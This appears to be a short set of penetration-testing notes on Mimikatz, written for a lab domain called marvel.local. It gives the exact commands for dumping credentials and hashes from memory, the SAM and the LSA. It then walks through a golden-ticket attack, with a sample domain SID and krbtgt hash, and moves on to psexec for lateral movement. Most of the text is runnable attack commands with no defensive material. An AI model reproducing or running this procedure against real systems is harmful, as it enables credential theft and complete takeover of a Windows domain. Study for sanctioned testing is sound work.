Mimikatz
Once we get Domain Admin we can use mimikatz to dump the creds
Launch mimikatz from the target and run
privilege::debug
(will allow us to debug processes):Can be useful on a compromised regular computer
sekurlsa::logonpasswords
we get NTLM (v1) hash and could try to use pass-the-hash.With wdigest we can see passwords in cleartext (prior to win 7) after only deactivate so possible to reactivate it with mimikats and wait for somebody to log on.
Dump the sam
lsadump::sam
orlsadump::sam /patch
Dump lsa (Local Security Authority)
lsadump::lsa /patch
we get ntlm hashes and try to crack them.
Mimikatz - Golden Ticket Attack
With a Golden ticket we can get access to any resource and system on the domain = complete access to the entire domain
lsadump::lsa /inject /name:krbtgt
Take note of:
Domain SID:
S-1-5-21-1324315119-2624990979-1304259423
NTLM Hash of krbtgt:
0afd880b6c9c7207067f0e15dab634a9
Pass the ticket:
kerberos::golden /User:AnyDoesNotNeedToExist /domain:marvel.local /sid:S-1-5-21-1324315119-2624990979-1304259423 /krbtgt:0afd880b6c9c7207067f0e15dab634a9 /id:500 /ptt
Get a cmd prmpt using the session and golden ticket
misc::cmd
We can access to anything on the network:
We can then use psexec to get a shell on a machine from the network
We download psexec on our compromised machine
We get the shell
Mimikatz - Resources
Last updated